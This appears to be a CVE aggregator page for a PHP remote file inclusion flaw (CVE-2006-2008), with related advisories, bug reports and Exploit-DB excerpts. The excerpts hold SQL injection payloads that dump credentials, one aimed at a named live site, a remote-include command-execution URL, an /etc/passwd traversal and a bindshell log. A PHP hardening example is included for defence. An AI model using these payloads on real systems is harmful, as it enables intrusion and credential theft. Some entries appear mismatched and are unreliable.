CVE-2006-2008
Published 2006-04-25
Priority: P3 · 46 · high · 7.5 (CVSS 2.0) · vector AV:N/AC:L/Au:N/C:P/I:P/A:P · exploit available
EPSS: 3.45% (87.5th percentile)
PHP remote file inclusion vulnerability in movie_cls.php in Built2Go PHP Movie Review 2B and earlier allows remote attackers to execute arbitrary PHP code via a URL in the full_path parameter.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| built2go | movie_review | — | — |
| built2go | movie_review | — | — |
| built2go | movie_review | — | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vendor_redhat | — | 6.8 | MEDIUM | — |
GHSA
CVE-2006-2008 [HIGH] GHSA-fwv8-vx7p-977c: PHP remote file inclusion vulnerability in movie_cls
ghsa_unreviewed · 2022-05-01
PHP remote file inclusion vulnerability in movie_cls.php in Built2Go PHP Movie Review 2B and earlier allows remote attackers to execute arbitrary PHP code via a URL in the full_path parameter.
Red Hat
CVE-2008-5814 [LOW] CWE-79 php: XSS via PHP error messages
vendor_redhat · 2008-12-19 · CVSS 2.6
Cross-site scripting (XSS) vulnerability in PHP, possibly 5.2.7 and earlier, when display_errors is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: because of the lack of details, it is unclear whether this is related to CVE-2006-0208.
Red Hat
CVE-2008-4775 [MEDIUM] CWE-79 phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
vendor_redhat · 2008-10-27 · CVSS 6.8
Cross-site scripting (XSS) vulnerability in pmd_pdf.php in phpMyAdmin 3.0.0, and possibly other versions including 2.11.9.2 and 3.0.1, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the db parameter, a different vector than CVE-2006-6942 and CVE-2007-5977.
Red Hat
CVE-2008-3714 [LOW] CWE-79 awstats: Cross-site scripting (XSS) vulnerability
vendor_redhat · 2008-06-23 · CVSS 2.6
Cross-site scripting (XSS) vulnerability in awstats.pl in AWStats 6.8 allows remote attackers to inject arbitrary web script or HTML via the query_string, a different vulnerability than CVE-2006-3681 and CVE-2006-1945.
Red Hat
CVE-2008-1373 [LOW] cups: overflow in gif image filter
vendor_redhat · 2008-04-01 · CVSS 2.6
Buffer overflow in the gif_read_lzw function in CUPS 1.3.6 allows remote attackers to have an unknown impact via a GIF file with a large code_size value, a similar issue to CVE-2006-4484.
Red Hat
CVE-2008-1562 [MEDIUM] wireshark: crash in LDAP dissector
vendor_redhat · 2008-03-28 · CVSS 5.0
The LDAP dissector in Wireshark (formerly Ethereal) 0.99.2 through 0.99.8 allows remote attackers to cause a denial of service (application crash) via a malformed packet, a different vulnerability than CVE-2006-5740.
Red Hat
CVE-2008-0564 [MEDIUM] CWE-79 mailman: XSS triggerable by list administrator
vendor_redhat · 2008-01-03 · CVSS 6.8
Multiple cross-site scripting (XSS) vulnerabilities in Mailman before 2.1.10b1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to (1) editing templates and (2) the list's "info attribute" in the web administrator interface, a different vulnerability than CVE-2006-3636.
Package: mailman (Red Hat Enterprise Linux 6) - Not affected
Red Hat
CVE-2006-2050 [MEDIUM] SQL injection vulnerability in dcboard
vendor_redhat · CVSS 5.0
SQL injection vulnerability in dcboard.cgi in DCScripts DCForumLite 3.0 allows remote attackers to execute arbitrary SQL commands via the az parameter.
Statement: Red Hat does not consider this to be a security issue. The FastCGI server is local trusted code and not under the control of an attacker; no trust boundary is crossed.
For more information please see:
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2008-2050
No detection rules found.
Exploit-DB
CVE-2009-2554 Joomla! Component Jobline 1.3.1 - Blind SQL Injection
exploitdb · 2009-07-17
---
##################################################
# Joomla Component: Jobline magic_quotes_gpc =Off
# ==================================
# {Author}: ManhLuat93
# {My HomePage}: http://manhluat.com/
##################################################
Live Demo: http://www.ntca.org/index.php?option=com_jobline&task=results&Itemid=&search=
[-] Exploit [+]
[--] http://localh0st/index.php?option=com_jobline&task=results&Itemid=&search=%' and substring(@@version,1,1)=5 and '%'='
[++] http://www.ntca.org/index.php?option=com_jobline&task=results&Itemid=&search=%' and substring(@@version,1,1)=5 and '%'='
note:
Jobline
08 Jan 2008
1.3.1
1.5
(c) 2006 Olle Johansson
GNU GPL
# milw0rm.com [2009-07-17]
Exploit-DB
CVE-2008-5489 ClipShare Pro 2006-2007 - 'chid' SQL Injection
exploitdb · 2008-11-15
---
[ASCII banner: SNAKES TEAM]
Script: clipShare Remote SQL Injection Vulnerability
:::ALGERIAN HaCkEr:::
Discovered By: Snakespc
home: www.snakespc.com/sc
Mail: [email protected]
script: http://www.clip-sha
Exploit-DB
CVE-2006-6488 [HIGH] ICONICS Vessel / Gauge / Switch 8.02.140 - ActiveX Buffer Overflow (Metasploit)
exploitdb · 2008-09-25 · CVSS 7.5
---
##
# $Id: iconics_dlgwrapper.rb 1 2008-09-21 22:43:00Z kf $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
#
# $ msfcli exploit/windows/browser/iconics_dlgwrapper RHOST=10.211.55.6 PAYLOAD=windows/shell_bind_tcp E
require 'msf/core'
module Msf
class Exploits::Windows::Browser::Iconics_Dlgwrapper 'ICONICS Vessel / Gauge / Switch 8.02.140 ActiveX DoModal Overflow',
'Description' => %q{
This module exploits a stack overflow in the Iconics Vessel / Gauge / Switch ActiveX controls
},
'Lice
Exploit-DB
CVE-2008-4470 Numark Cue 5.0 rev 2 - '.m3u' File Local Stack Buffer Overflow
exploitdb · 2008-09-06
---
/*Numark Cue 5.0 rev 2 Local .M3U File Stack Buffer Overflow
This sploit launches calc.exe .. classical buffer overflow, a 500-byte buffer is causing the exception.
Tested on WinXP Pro SP3, compiled with Dev-C++ 4.9.9.2.
After preparation:
|Access violation when executing [58414158]|
EAX 00000001
ECX 004C01B2 cue_tria.004C01B2
EDX 01030608
EBX 0309948D ASCII "I:\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ESP 0013EC98 ASCII "eeeeeeeeeeeeeeeeeeeeeeeeeeeYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYr Of The Dog Again (2006)[T-Boyz]\13.
Exploit-DB
CVE-2008-7167 Page Manager CMS 2006-02-04 - Arbitrary File Upload
exploitdb · 2008-06-25
---
Page Manager CMS Remote Arbitrary File Upload Vulnerability
[ASCII banner: CWH Underground Hacking Team]
AUTHOR : CWH Underground
DATE : 25 June 2008
SITE : www.citec.us
#####################################################
APPLICATION : Page Manager
VERSION : 2006-02-04
VENDOR : N/A
DOWNLOAD : http://downloads.sourceforge.net/pagemanager
#####################################################
---Arbitrary File Upload Exploit---
This vulnerability allows uploading malicious files directly to the web server.
[A
Exploit-DB
CVE-2006-5202 [MEDIUM] Linksys WRT54G Firmware 1.00.9 - Security Bypass (2)
exploitdb · 2008-06-24 · CVSS 5.0
---
[ASCII banner: KINQPINZ.INFO]
<><> Hacking the Linksys WRT54G #2
<><> https://kinqpinz.info/
<><> by meathive
<><> root at kinqpinz.info && kinqpinz.info at gmail.com
++| CVE-2008-1247
The web interface on the Linksys WRT54g router with firmware 1.00.9 does not require credentials
when invoking scripts, which allows remote attackers to perform arbitrary
Exploit-DB
CVE-2008-2006 Apple iCal 3.0.1 - 'COUNT' Integer Overflow
exploitdb · 2008-04-21
---
source: https://www.securityfocus.com/bid/28629/info
Apple iCal is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
This issue affects iCal 3.0.1 running on Mac OS X 10.5.1; previous versions may also be affected.
BEGIN:VCALENDAR
X-WR-TIMEZONE:America/Buenos_Aires
PRODID:-//Apple Inc.//iCal 3.0//EN
CALSCALE:GREGORIAN
X-WR-CALNAME: Vulnerable
VERSION:2.0
X-WR-RELCALID:10DE4203-4FA5-4E23-AE4D-9DAE3157C9E5
METHOD:PUBLISH
BEGIN:VTIMEZONE
TZID:America/Buenos_Aires
BEGIN:DAYLIGHT
TZOFFSETFROM:-0300
TZOFFSETTO:-
Exploit-DB
CVE-2008-1611 TFTP Server 1.4 - ST Buffer Overflow
exploitdb · 2008-03-26
---
#!/usr/bin/python
# TFTP Server for Windows V1.4 ST (0day)
# http://sourceforge.net/projects/tftp-server/
# Tested on Windows Vista SP0.
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/sourceforge-tftpd.py.txt
##################################################################
# bt ~ # sourceforge-tftpd.py
# [*] TFTP Server for Windows V1.4 ST (0day)
# [*] http://www.offensive-security.com
# [*] Sending evil packet, ph33r
# [*] Check port 4444 for bindshell
# bt ~ # nc -v 172.16.167.134 4444
# (UNKNOWN) [172.16.167.134] 4444 (krb524) open
# Microsoft Windows [Version 6.0.6000]
# Copyright (c) 2006 Microsoft Corporation. All
# rights reserved.
#
# C:\Windows\system32>
##############################
Exploit-DB
CVE-2008-1505 Joomla! Component custompages 1.1 - Remote File Inclusion
exploitdb · 2008-03-22
---
@ JOOmla Component custompages custompages
06/11/2006
Shawn Sandy
Copyright 2006 - Shawn Sandy
License
[email protected]
www.sstreamtv.com
1.1
# milw0rm.com [2008-03-22]
Exploit-DB
CVE-2008-1407 eXV2 Module WebChat 1.60 - 'roomid' SQL Injection
exploitdb · 2008-03-14
---
##########################################
#
# Powered by eXV2 WebChat 1.60 SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAİL : [email protected]
#
###########################################
#
# DORKS 1 : allinurl :"modules/WebChat"
#
###########################################
EXPLOIT 1 :
modules/WebChat/index.php?roomid=-9999999/**/union/**/select/**/0,uname,0x3a,0x3a,pass/**/from/**/exv2_users/*where%20exv2_admin%201
###########################################
WebChat 1.60
Submit date: 2006/6/13
Homepage: www.exv2.de
Version : 1.60
Downloads : 561
Filesize : 79.76 KB
Supported platforms : eXV2
#################################
Exploit-DB
CVE-2008-1406 eXV2 Module MyAnnonces - 'lid' SQL Injection
exploitdb · 2008-03-14
---
##########################################
#
# Powered by eXV2 MyAnnonces 1.8 SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAİL : [email protected]
#
###########################################
#
# DORK 1 : eXV2 MyAnnonces
#
###########################################
EXPLOIT :
modules/MyAnnonces/annonces-p-f.php?op=ImprAnn&lid=-9999999/**/union/**/select/**/pass,pass,uname,0x3a,0x3a,0x3a,0x3a,0,0,0,0x3a,0x3a,1/**/from/**/exv2_users/*where%20exv2_admin%201
###########################################
Category: eXV2 - Module
myannonces 1.8
Submit date: 2006/4/10
Version : 1.8
###########################################
################
Exploit-DB
CVE-2008-0814 TRUC 0.11.0 - 'download.php' Remote File Disclosure
exploitdb · 2008-02-16
---
### TRUC 0.11.0 (download.php) Remote File Disclosure Vulnerability
### http://switch.dl.sourceforge.net/sourceforge/truc/truc_0.11.0.tar.gz
### POC :
### /download.php?upload_filename=config_inc.php
### /download.php?upload_filename=../../../../../../../../etc/passwd
### Dork : TRUC 0.11.0 :: © 2006 by ASDIS :
### I'm TRYAGI ;) -- Tryag.cc/cc
# milw0rm.com [2008-02-16]
Exploit-DB
CVE-2008-0721 Mambo Component Sermon 0.2 - 'gid' SQL Injection
exploitdb · 2008-02-07
---
#########################################################################
#
# netadvantist@copyright 2006 SQL Injection(com_na_xxx)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com
#
#########################################################################
#
# DORKS 1 : allinurl:"com_na_content"
#
# DORK 2 : allinurl:"com_na_bible"
#
# DORKS 3 : allinurl:"com_na_events"
#
# DORKS 4 : allinurl:"com_na_content"
#
# DORKS 5 : allinurl:"com_na_feedback"
#
# DORKS 6 : allinurl:"com_na_mydocs"
#
# DORKS 7 : allinurl:"com_na_churchmap"
#
# DORKS 8 : allinurl:"com_na_bibleinfo"
#
# DORKS 9 : allinurl:"com_na_dbs"
#
# DORKS 10 : allinurl:"com_na_udm"
#
# DORKS 1
Exploit-DB
CVE-2008-0353 PHP-RESIDENCE 0.7.2 - 'Search' SQL Injection
exploitdb · 2008-01-16
---
#####################################################################################
#### PHPRESIDENCE 0.7.2 Remote Sql Injection ####
#### BY IRCRASH ####
#####################################################################################
# #
#AUTHOR : IRCRASH (R3d.W0rm) #
# #
#Script Download : http://www.digitaldruid.net/download/php-residence_0.7.2.zip #
# #
#Vulnerability Page: http://site.com/path/visualizza_tabelle.php?id_sessione=&anno=2006&tipo_tabella=clienti
# #
#Search query : 99999'union/**/select/**/idutenti,nome_utente,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/utenti/*
# #
#Help : Go Vulnerability Pag
Exploit-DB
CVE-2008-5199 IdeaBox 1.1 - 'gorumDir' Remote File Inclusion
exploitdb · 2006-06-19
---
$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$ IdeaBox <= 1.1 (gorumDir) Remote File Include Vulnerability
$$ script site: http://ideabox.phpoutsourcing.com/
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: [email protected] or http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$ Adam, DeathSpeed, Drzewko, pepi
$$
$$ Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
/*
19 June 2006. I'm disappearing for a month, going on holiday :-)
19 June 2006 go to vacations !!!! I return for month, Cya ;-)
*/
#include.p
Exploit-DB
CVE-2006-2008 Built2Go PHP Movie Review 2B - Remote File Inclusion
exploitdb · 2006-04-23
---
Built2Go PHP Movie Review <=2B Remote File Inclusion Vulnerability
in movie_cls.php
# require_once("$full_path/review_cls.php");
usage:
# http://www.site.com/[path]/movie_cls.php?full_path=http://www.site.com/x.txt?&cmd=uname -a
# milw0rm.com [2006-04-23]
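The include pattern quoted in the advisory beside a hardened form, as an added illustration that is not Built2Go's code. It assumes that `$full_path` reached the `require_once` from the request (for instance via `register_globals`, which the usage line implies); `safe_include_root` and `hardened_include` are names made up for this example.

```php
<?php
// Added example (not Built2Go's code). Only movie_cls.php, review_cls.php and
// $full_path come from the advisory; the helper names below are assumptions.

// --- Vulnerable shape, as the advisory describes it --------------------------
// With register_globals on (removed in PHP 5.4) or an equivalent
// "$full_path = $_GET['full_path']" assignment, the include prefix is
// request-controlled. If allow_url_include is also on, "$full_path/review_cls.php"
// can resolve to a remote URL whose body is then executed as PHP.
function vulnerable_include(string $full_path): void
{
    require_once("$full_path/review_cls.php");
}

// --- Hardened shape ----------------------------------------------------------
// 1. The application knows where its own files live: derive the prefix from
//    __DIR__, never from request data.
// 2. If a configurable root is unavoidable, resolve it with realpath() and
//    require that it stays under the application directory. URL schemes and
//    stream wrappers ("http://", "ftp://", "php://", "data:") make realpath()
//    return false; traversal resolves outside the root. Both are rejected
//    before any include runs.
// 3. Defense in depth in php.ini: allow_url_include=Off (the default) and,
//    where the application does not need it, allow_url_fopen=Off.
function safe_include_root(?string $candidate = null): string
{
    $allowed_root = realpath(__DIR__);           // the application's own directory
    $requested    = $candidate ?? $allowed_root; // default: no request influence at all

    $resolved = realpath($requested);            // false for URLs, wrappers, missing paths
    if ($resolved === false) {
        throw new RuntimeException('include root does not exist on the local filesystem');
    }

    // Containment check: the resolved path must be the root itself or a child of it.
    $prefix = rtrim($allowed_root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($resolved !== $allowed_root && strncmp($resolved, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('include root escapes the application directory');
    }
    return $resolved;
}

function hardened_include(): void
{
    $full_path = safe_include_root();            // never read from $_GET / $_REQUEST
    require_once $full_path . '/review_cls.php';
}

// Self-check of the validator with constructed probes (nothing is fetched or included).
foreach (['http://remote.example/x.txt?', '../../../../etc', __DIR__] as $probe) {
    try {
        printf("%-32s -> accepted: %s\n", $probe, safe_include_root($probe));
    } catch (RuntimeException $e) {
        printf("%-32s -> rejected: %s\n", $probe, $e->getMessage());
    }
}
```

Only the last probe is accepted; the URL fails `realpath()` outright and the traversal resolves outside the application directory.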
Bugzilla
CVE-2008-5814 [LOW] php: XSS via PHP error messages
bugzilla · 2009-01-15 · CVSS 2.6
Common Vulnerabilities and Exposures assigned an identifier CVE-2008-5814 to the following vulnerability:
Cross-site scripting (XSS) vulnerability in PHP, possibly 5.2.7 and earlier,
when display_errors is enabled, allows remote attackers to inject arbitrary web
script or HTML via unspecified vectors. NOTE: because of the lack of details,
it is unclear whether this is related to CVE-2006-0208.
References:
http://jvndb.jvn.jp/en/contents/2008/JVNDB-2008-000084.html
http://jvn.jp/en/jp/JVN50327700/index.html
Discussion:
PHP packages as shipped in Red Hat Enterprise Linux 4 and later set display_errors to off in the default php.ini configuration file.
Default setting for display_errors in PHP packages in Red Hat Enterprise Linux 2.1 and 3 is
Bugzilla
CVE-2008-4775 [MEDIUM] phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
bugzilla · 2008-10-29 · CVSS 6.8
Common Vulnerabilities and Exposures assigned an identifier CVE-2008-4775 to the following vulnerability:
Cross-site scripting (XSS) vulnerability in pmd_pdf.php in phpMyAdmin
3.0.0, and possibly other versions including 2.11.9.2 and 3.0.1, when
register_globals is enabled, allows remote attackers to inject
arbitrary web script or HTML via the db parameter, a different vector
than CVE-2006-6942 and CVE-2007-5977.
References:
http://www.securityfocus.com/archive/1/archive/1/497815/100/0/threaded
http://www.securityfocus.com/bid/31928
http://secunia.com/advisories/32449
Discussion:
613 (phpMyAdmin): Build on target fedora-4-epel succeeded.
612 (phpMyAdmin): Build on target fedora-5-epel suc
Bugzilla
CVE-2008-3714 [LOW] awstats: Cross-site scripting (XSS) vulnerability
bugzilla · 2008-08-20 · CVSS 2.6
Common Vulnerabilities and Exposures assigned an identifier CVE-2008-3714
to the following vulnerability:
Cross-site scripting (XSS) vulnerability in awstats.pl in AWStats 6.8 allows
remote attackers to inject arbitrary web script or HTML via the query_string,
a different vulnerability than CVE-2006-3681 and CVE-2006-1945.
References:
http://bugs.gentoo.org/show_bug.cgi?id=235225
Upstream patch:
http://awstats.cvs.sourceforge.net/awstats/awstats/wwwroot/cgi-bin/awstats.pl?r1=1.910&r2=1.912
Upstream bug report:
http://sourceforge.net/tracker/index.php?func=detail&aid=2001151&group_id=13764&atid=113764
Discussion:
CVE-2008-3714: This issue affects the versions of the awstats package
as shipped with Fedora 8, Fedora 9 a
Bugzilla
CVE-2006-5755 [MEDIUM] kernel: local denial of service due to NT bit leakage
bugzilla · 2008-08-04 · CVSS 4.9
Description of problem:
Linux kernel before 2.6.18, when running on x86_64 systems, does not properly save or restore EFLAGS during a context switch, which allows local users to cause a denial of service (crash) by causing SYSENTER to set an NT flag, which can trigger a crash on the IRET of the next task.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5755
Discussion:
Proposed upstream patch:
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=658fdbef66e5e9be79b457edc2cbbb3add840aa9
---
Created attachment 313340
Upstream patch for this issue
---
This was addressed via:
Red Hat Enterprise Linux version 5 (RHSA-2008:0957)
Bugzilla
CVE-2008-1562 [MEDIUM] wireshark: crash in LDAP dissector
bugzilla · 2008-04-01 · CVSS 5.0
Common Vulnerabilities and Exposures assigned an identifier CVE-2008-1562 to the following vulnerability:
The LDAP dissector in Wireshark (formerly Ethereal) 0.99.2 through 0.99.8 allows remote attackers to cause a denial of service (application crash) via a malformed packet, a different vulnerability than CVE-2006-5740.
References:
http://www.wireshark.org/security/wnpa-sec-2008-02.html
http://www.securityfocus.com/bid/28485
http://www.frsirt.com/english/advisories/2008/1007/references
http://secunia.com/advisories/29569
Discussion:
wireshark-1.0.0-1.fc7 has been pushed to the Fedora 7 stable repository. If problems still persist, please make note of it in this bug report.
---
wireshark-1.0.0-1.fc8 has been pushed to the Fedora 8 stabl
Bugzilla
CVE-2008-1373 [LOW] cups: overflow in gif image filter
bugzilla · 2008-03-20 · CVSS 2.6
It was discovered that the GIF parsing code used by the CUPS printing system is affected
by a similar issue as the GIF parsers used by gd / netpbm / tk / SDL_image.
The value of code_size read from a GIF image is not properly validated before being
used to initialize the table array in gif_read_lzw(), causing a static buffer overflow.
Issue is similar to:
CVE-2006-4484 (gd), CVE-2007-6697 (SDL_image), CVE-2008-0553 (tk), CVE-2008-0554
(netpbm)
Discussion:
Created attachment 298680
Proposed patch
Similar to the fixes used in gd / tk / netpbm / SDL_image.
---
Tracked upstream via: http://www.cups.org/str.php?L2765
---
cups-1.2.12-10.fc7 has been submitted as an update for Fedora 7
---
cups-1.3.6-4.fc8 has been pushed to the Fedora 8 stable repository. If probl
Bugzilla
CVE-2008-1367 [HIGH] [RHEL5] Kernel doesn't clear DF for signal handlers
bugzilla · 2008-03-05 · CVSS 7.5
The Debian folks reported that the kernel doesn't ensure the direction flag is cleared
upon entry to a signal handler, which violates both the i?86 and x86_64 ABIs.
Old GCCs conservatively used cld anyway before using any instructions that use
that flag, but GCC 4.3 no longer does that; it relies on the ABI guarantee that
on entry to a function the direction flag must be cleared.
See http://gcc.gnu.org/ml/gcc-patches/2006-12/msg00276.html
Anything that uses the std instruction must cld again before calling another
function or before returning from the function.
Unfortunately, if an async signal is sent while a thread has the DF flag set via std, the kernel
will start a signal handler with the DF flag set.
The fix is addition of regs->eflags &= ~X86_EFLAGS_DF; or si
Bugzilla
CVE-2008-0553 [LOW] tk: GIF handling buffer overflow
bugzilla · 2008-02-05 · CVSS 2.6
The tk GIF handling code is based on the same code as used by gd and SDL_image and
is affected by the overflow known as CVE-2006-4484 and CVE-2007-6697.
The ReadImage function in tkImgGIF.c does not properly check the initialCodeSize
value read from a GIF image before using it as the upper bound during
the initialization of the append array. This can result in a stack buffer overflow.
Upstream fix:
http://tktoolkit.cvs.sourceforge.net/tktoolkit/tk/generic/tkImgGIF.c?r1=1.40&r2=1.41
This is expected to be included in upstream tk version 8.5.1.
Related issues:
CVE-2006-4484 (gd), CVE-2007-6697 (SDL_image), CVE-2008-0554 (netpbm)
Discussion:
perl-Tk uses embedded copy of tk source code and is affected by this problem
too. Adding perl-Tk maintainers t
Bugzilla
CVE-2008-0554 [LOW] netpbm: GIF handling buffer overflow in giftopnm
bugzilla · 2008-02-05 · CVSS 2.6
The GIF handling code used in netpbm's giftopnm converter is based on the same code
as used by gd and SDL_image and is affected by the overflow known as
CVE-2006-4484 and CVE-2007-6697.
The readImageData function in giftopnm.c does not properly check the lzwMinCodeSize
value read from a GIF image before passing it to lzwInit, which
uses it as the upper bound during the initialization of a fixed-size table array,
leading to a buffer overflow.
This issue was fixed in upstream version 10.27. The code checking the value is in
the initial giftopnm.c revision in the project's public SVN repository:
http://netpbm.svn.sourceforge.net/viewvc/netpbm/trunk/converter/other/giftopnm.c?revision=1&view=markup#l_1052
This issue does not affect netpbm pa
Bugzilla
CVE-2008-0553 [LOW] tk: GIF handling buffer overflow [rawhide]
bugzilla · 2008-02-05 · CVSS 2.6
+++ This bug was initially created as a clone of Bug #431518 +++
The tk GIF handling code is based on the same code as used by gd and SDL_image and
is affected by the overflow known as CVE-2006-4484 and CVE-2007-6697.
The ReadImage function in tkImgGIF.c does not properly check the initialCodeSize
value read from a GIF image before using it as the upper bound during
the initialization of the append array. This can result in a stack buffer overflow.
Upstream fix:
http://tktoolkit.cvs.sourceforge.net/tktoolkit/tk/generic/tkImgGIF.c?r1=1.40&r2=1.41
This is expected to be included in upstream tk version 8.5.1.
Related issues:
CVE-2006-4484 (gd), CVE-2007-6697 (SDL_image), CVE-2008-0554 (netpbm)
-- Additional comment from [email protected] on
Bugzilla
CVE-2006-4538 [MEDIUM] kernel: Local DoS with corrupted ELF
bugzilla · 2007-09-13 · CVSS 4.9
Already fixed for RHEL4, but not for RHEL3/2.1-ia64. See bz#205335 for
EL4 reproducer.
From Kirill Korotaev:
When running on IA64 or SPARC platforms, local users can cause a denial of
service via a malformed ELF file, triggered by cross-region mappings.
http://lkml.org/lkml/2006/9/4/116
Discussion:
This issue has been addressed in the following products:
Red Hat Linux Enterprise 2.1
Red Hat Linux Enterprise 3
Via RHSA-2007:1049 available at https://rhn.redhat.com/errata/RHSA-2007-1049.html and RHSA-2008:0787 available at https://rhn.redhat.com/errata/RHSA-2008-0787.html
Tenable
[HIGH] Marcus Ranum PaulDotCom Interview on Penetration Testing
blogs_tenable · 2008-12-14 · CVSS 7.8
Ron Gula, December 14, 2008
Tenable's CSO, Marcus Ranum, was recently interviewed on the PaulDotCom Security Weekly podcast. They discussed a wide range of topics regarding penetration testing, secure coding, Marcus's "6 Dumbest Ideas" in computer security and much more.
- Full PaulDotCom show notes.
- Direct link to the show's MP3 audio recording.
- Tenable podcast and slides on Marcus's "6 Dumbest Ideas in Computer Security" presentation from 2006.
- Very cool image of Marcus Ranum demonstrating cutting edge computer security practices.
References:
- http://secunia.com/advisories/19749
- http://www.osvdb.org/24887
- http://www.securityfocus.com/bid/17679
- http://www.vupen.com/english/advisories/2006/1481
- https://exchange.xforce.ibmcloud.com/vulnerabilities/26063
- https://www.exploit-db.com/exploits/1711